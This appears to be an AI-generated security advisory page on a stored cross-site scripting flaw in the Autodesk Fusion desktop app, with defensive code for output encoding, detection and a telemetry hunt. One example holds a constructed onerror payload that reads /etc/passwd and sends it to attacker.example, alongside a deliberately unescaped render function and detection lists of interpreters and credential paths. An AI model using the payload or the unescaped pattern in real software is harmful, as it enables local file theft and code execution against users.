CVE-2025-10244 Overview
CVE-2025-10244 is a stored cross-site scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A maliciously crafted HTML payload, when rendered by the application, executes script in the context of the Fusion process rather than in an isolated browser tab. An attacker can use this to read local files or execute arbitrary code on the victim's machine with the privileges of the user account running Fusion. The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation) and is reported with a CVSS 3.1 score of 8.7.
Critical Impact
Successful exploitation allows local file disclosure and arbitrary code execution within the Autodesk Fusion desktop process, compromising user data and system integrity.
Affected Products
- Autodesk Fusion (desktop application for Windows)
- Autodesk Fusion (desktop application for macOS)
- All versions prior to the fix released in Autodesk Security Advisory ADSK-SA-2025-0020
Discovery Timeline
- 2025-09-23 - CVE-2025-10244 published in the National Vulnerability Database (NVD)
- 2025-12-01 - NVD entry last modified
Technical Details for CVE-2025-10244
Vulnerability Analysis
The Autodesk Fusion desktop application renders HTML content in an embedded web view as part of its user interface and collaboration features. The application does not neutralize HTML and script content before rendering it, so attacker-controlled markup is interpreted as active content. Because that rendering happens inside the desktop process rather than in a sandboxed browser context, the injected script inherits whatever the Fusion process can do: it runs as the logged-in user, with that user's access to the filesystem and the ability to launch further processes. This turns what would be an ordinary web XSS into a local file read and arbitrary code execution primitive on the host, and it is why the Workarounds section recommends running Fusion from a non-administrator account.
Root Cause
The root cause is missing output encoding: HTML data is stored by the collaboration feature and later written into the desktop client's rendered page without being escaped for the HTML context. Because the payload is stored rather than reflected, it persists across sessions, and any user who opens or previews the affected resource triggers it. The desktop web view also does not enforce a content security policy restrictive enough to block inline script execution or access to local resources, so there is no second layer to stop a payload once it reaches the renderer.
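The following is an added example, not Autodesk's code and not taken from the advisory: it models the rendering defect described above with a hypothetical "comment" record (author and body; Fusion's real storage format is not documented here), shows a constructed payload of the kind a stored XSS in a privileged web view would carry, and contrasts the unencoded render with one that escapes every untrusted value for the HTML text context. The CSP string is a generic hardening value for an embedded web view, not a setting the page attributes to Fusion. The `containsActiveContent` check at the end is the same kind of pattern the Detection section's content hunt relies on.

```javascript
// Added example (not Autodesk code): how a stored HTML fragment becomes script
// execution in a desktop web view, and the output encoding that prevents it.
// The comment record below is a hypothetical data model used for illustration.

// Constructed attacker payload as it might be stored in a shared resource.
// An inline event handler is enough: no <script> tag is needed. In a
// privileged web view the handler can reach file:// and exfiltrate.
const STORED_PAYLOAD = {
  author: 'mallory',
  body: '<img src=x onerror="fetch(\'file:///etc/passwd\').then(r=>r.text())' +
        '.then(t=>fetch(\'https://attacker.example/x?d=\'+encodeURIComponent(t)))">',
};

// VULNERABLE: stored data is concatenated straight into the markup the web
// view renders. Any <script>, on* handler or javascript: URI in the data
// executes with the application's privileges.
function renderCommentVulnerable(comment) {
  return `<div class="comment"><b>${comment.author}</b>: ${comment.body}</div>`;
}

// HARDENED: encode each untrusted value for the HTML text context before it
// reaches the markup, so markup contained in the data is displayed as text.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '`': '&#96;' };
  return String(value).replace(/[&<>"'`]/g, (ch) => map[ch]);
}

function renderCommentHardened(comment) {
  return `<div class="comment"><b>${escapeHtml(comment.author)}</b>: ${escapeHtml(comment.body)}</div>`;
}

// Defence in depth for an embedded web view (generic value, assumed rather
// than taken from Fusion): no inline script, no remote script, no arbitrary
// connect targets. Delivered with the page or via the web view's equivalent
// setting, this blocks the inline onerror handler above even if encoding is
// forgotten somewhere.
const WEB_VIEW_CSP =
  "default-src 'none'; script-src 'self'; style-src 'self'; img-src 'self' data:; connect-src 'self'";

// Crude "does this markup still carry executable content" check: a <script>
// tag, an on* attribute inside a tag, or a javascript: URI in href/src.
// Escaped output never matches because the '<' that opens a tag is gone.
const ACTIVE_CONTENT =
  /<script\b|<[a-z][^>]*\bon[a-z]+\s*=|<[a-z][^>]*\b(?:href|src)\s*=\s*["']?\s*javascript:/i;

function containsActiveContent(html) {
  return ACTIVE_CONTENT.test(html);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable :', containsActiveContent(renderCommentVulnerable(STORED_PAYLOAD)));
  console.log('hardened   :', containsActiveContent(renderCommentHardened(STORED_PAYLOAD)));
  console.log('csp        :', WEB_VIEW_CSP);
}
```

Encoding at the output point is the fix; stripping `<script>` tags from input is not, because the inline handler in the constructed payload would survive such a filter. The CSP is a backstop, and it only helps if the web view actually honours it without `'unsafe-inline'`.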
Attack Vector
The attack vector is network-based and requires user interaction. A low-privileged authenticated actor stores a crafted HTML payload in a shared Fusion resource. When a victim opens or previews that resource in the Fusion desktop application, the payload runs in the application's context. The scope change in the score reflects that the impact is not confined to the rendering component: the script reaches the underlying operating system, reading local files and executing code as the victim user.
No verified public proof-of-concept code is available. See the Autodesk Security Advisory ADSK-SA-2025-0020 for vendor technical details.
Detection Methods for CVE-2025-10244
Indicators of Compromise
- Unexpected child processes spawned by the Autodesk Fusion executable, particularly command shells, powershell.exe, or scripting interpreters
- Outbound network connections from the Fusion process to non-Autodesk infrastructure following the opening of a shared design or document
- Local file read activity by Fusion targeting sensitive directories such as user profile folders, SSH keys, or browser credential stores
Detection Strategies
- Monitor process lineage for the Autodesk Fusion process (Fusion360.exe on Windows, installed per user under %LOCALAPPDATA%\Autodesk\webdeploy\production\; the Autodesk Fusion application bundle on macOS) launching unexpected interpreters or LOLBins such as cmd.exe, powershell.exe, wscript.exe, mshta.exe, rundll32.exe, or osascript; the Fusion Client Downloader is the installer and is not the process that renders shared content
- Hunt for HTML files within Fusion project storage containing <script> tags, event handlers such as onerror=, or javascript: URIs
- Inspect endpoint telemetry for Fusion-initiated file reads on paths outside its expected working directories
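As an added example (not part of the page or of any vendor tooling), the hunt below applies the three detection strategies above to a handful of constructed telemetry events: process creation, network connection and file read records in a JSON-lines shape loosely modelled on Sysmon event IDs 1 and 3. The field names (`type`, `image`, `parentImage`, `commandLine`, `dest`, `target`), the interpreter list, the sensitive-path patterns and the egress allowlist (only `autodesk.com` subdomains) are assumptions to be adapted to the EDR export and environment in use.

```javascript
// Added example (not from the page or Autodesk): hunt over endpoint telemetry
// for Fusion spawning interpreters, Fusion egress to non-Autodesk hosts, and
// Fusion reading credential material. Event schema and lists are assumptions.

// Process names for the Fusion client: the Windows executable, and the
// assumed binary name inside the macOS application bundle.
const FUSION_IMAGES = new Set(['fusion360.exe', 'autodesk fusion']);

// Interpreters and LOLBins that a CAD client has no business launching.
const INTERPRETERS = new Set([
  'cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe',
  'rundll32.exe', 'regsvr32.exe', 'certutil.exe', 'sh', 'bash', 'zsh', 'osascript', 'python', 'python3',
]);

// Egress allowlist (assumption: tighten or extend from your own proxy logs).
const ALLOWED_EGRESS_SUFFIXES = ['.autodesk.com'];

// Paths whose read by the Fusion process is worth an alert.
const SENSITIVE_PATHS = [
  /[\\/]\.ssh[\\/]/i, /[\\/]\.aws[\\/]credentials$/i, /Chrome[\\/]User Data[\\/].*Login Data$/i,
  /[\\/]Library[\\/]Keychains[\\/]/i, /[\\/]\.gitconfig$/i,
];

// Constructed sample telemetry. Backslashes are kept literal by String.raw so
// the JSON decodes to normal Windows paths. 203.0.113.7 is a documentation address.
const SAMPLE_TELEMETRY = [
  String.raw`{"type":"ProcessCreate","image":"C:\\Users\\alice\\AppData\\Local\\Autodesk\\webdeploy\\production\\a1b2\\Fusion360.exe","parentImage":"C:\\Windows\\explorer.exe","commandLine":"Fusion360.exe"}`,
  String.raw`{"type":"ProcessCreate","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parentImage":"C:\\Users\\alice\\AppData\\Local\\Autodesk\\webdeploy\\production\\a1b2\\Fusion360.exe","commandLine":"powershell.exe -nop -w hidden -c \"Start-Sleep 1\""}`,
  String.raw`{"type":"NetworkConnect","image":"C:\\Users\\alice\\AppData\\Local\\Autodesk\\webdeploy\\production\\a1b2\\Fusion360.exe","dest":"api.autodesk.com:443"}`,
  String.raw`{"type":"NetworkConnect","image":"C:\\Users\\alice\\AppData\\Local\\Autodesk\\webdeploy\\production\\a1b2\\Fusion360.exe","dest":"203.0.113.7:8443"}`,
  String.raw`{"type":"FileRead","image":"C:\\Users\\alice\\AppData\\Local\\Autodesk\\webdeploy\\production\\a1b2\\Fusion360.exe","target":"C:\\Users\\alice\\.ssh\\id_ed25519"}`,
  String.raw`{"type":"FileRead","image":"C:\\Users\\alice\\AppData\\Local\\Autodesk\\webdeploy\\production\\a1b2\\Fusion360.exe","target":"C:\\Users\\alice\\AppData\\Local\\Autodesk\\webdeploy\\production\\a1b2\\Resources\\ui.html"}`,
].join('\n');

// Lower-cased final path component, accepting both separator styles.
function basename(p) {
  return String(p || '').split(/[\\/]/).pop().toLowerCase();
}

function isFusion(imageName) {
  return FUSION_IMAGES.has(imageName);
}

// "host:port" -> true only for the allowlisted zone (exact or subdomain match).
function egressAllowed(dest) {
  const host = String(dest).replace(/:\d+$/, '').toLowerCase();
  return ALLOWED_EGRESS_SUFFIXES.some((s) => host === s.slice(1) || host.endsWith(s));
}

// Returns one finding per matching event, in input order.
function hunt(jsonl) {
  const findings = [];
  for (const line of jsonl.split('\n')) {
    if (!line.trim()) continue;
    const ev = JSON.parse(line);
    const image = basename(ev.image);
    const parent = basename(ev.parentImage);
    if (ev.type === 'ProcessCreate' && isFusion(parent) && INTERPRETERS.has(image)) {
      findings.push({ rule: 'fusion-spawns-interpreter', detail: `${parent} -> ${image}: ${ev.commandLine}` });
    } else if (ev.type === 'NetworkConnect' && isFusion(image) && !egressAllowed(ev.dest)) {
      findings.push({ rule: 'fusion-unexpected-egress', detail: ev.dest });
    } else if (ev.type === 'FileRead' && isFusion(image) && SENSITIVE_PATHS.some((re) => re.test(ev.target))) {
      findings.push({ rule: 'fusion-reads-sensitive-file', detail: ev.target });
    }
  }
  return findings;
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of hunt(SAMPLE_TELEMETRY)) console.log(`${f.rule}\t${f.detail}`);
}
```

The process-lineage rule is the highest-signal of the three; the egress rule needs a real allowlist built from a baseline of the Fusion process's normal destinations, since the client talks to several Autodesk-operated services and any CDN they front.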
Monitoring Recommendations
- Enable command-line argument logging on Windows endpoints and forward Fusion process events to a centralized SIEM
- Alert on Fusion network egress to domains not associated with Autodesk update or cloud services
- Review collaboration and shared workspace activity for newly uploaded content from low-trust accounts
How to Mitigate CVE-2025-10244
Immediate Actions Required
- Update Autodesk Fusion to the patched version specified in Autodesk Security Advisory ADSK-SA-2025-0020
- Restrict shared workspace and team project access to trusted collaborators only
- Audit existing Fusion projects for suspicious embedded HTML or script content prior to opening
Patch Information
Autodesk has released fixed installers for both Windows and macOS. Download the updated client from the official distribution links referenced in the advisory (the Fusion Client Downloader as an EXE for Windows and a DMG for macOS). After installation, confirm that the application version matches the fixed builds listed in the advisory; the version is also shown in the application's About dialog.
Workarounds
- Avoid opening Fusion files or shared projects originating from untrusted users until the patch is applied
- Run Autodesk Fusion under a standard (non-administrator) user account: the injected script runs with the privileges of whichever account launched Fusion, so an administrator account turns a user-level compromise into a machine-level one
- Apply host-based egress filtering to block the Fusion process from reaching arbitrary external endpoints
# Verify installed Autodesk Fusion version on Windows (PowerShell). Fusion is a
# per-user install; the executable lives under the user's webdeploy directory.
Get-ChildItem "$env:LOCALAPPDATA\Autodesk\webdeploy\production" -Recurse -Filter Fusion360.exe | ForEach-Object { $_.VersionInfo.ProductVersion }
# Verify installed Autodesk Fusion version on macOS
defaults read "/Applications/Autodesk Fusion.app/Contents/Info.plist" CFBundleShortVersionString
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.